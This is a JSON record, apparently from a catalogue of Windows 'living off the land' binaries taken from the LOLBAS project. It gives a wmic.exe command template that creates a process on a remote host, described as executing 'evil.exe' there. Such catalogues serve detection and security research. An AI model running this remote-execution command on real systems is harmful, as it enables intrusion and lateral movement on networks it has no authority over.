{
  "id": "lolbas-wmic-exe-execute-2",
  "name": "LOLBAS · Wmic.exe (Execute) #2",
  "command": "wmic.exe /node:\"192.168.0.1\" process call create \"{CMD}\"",
  "description": "Execute evil.exe on the remote system.",
  "platform": "windows",
  "tags": [
    "lolbas",
    "wmic",
    "execute"
  ],
  "source": "lolbas",
  "source_url": "https://lolbas-project.github.io/lolbas/Wmic/",
  "upstream_id": "Wmic.exe/Execute/1",
  "category": "lolbas",
  "subcategory": "execute",
  "references": [
    {
      "title": "LOLBAS — Wmic.exe",
      "url": "https://lolbas-project.github.io/lolbas/Wmic/"
    }
  ]
}
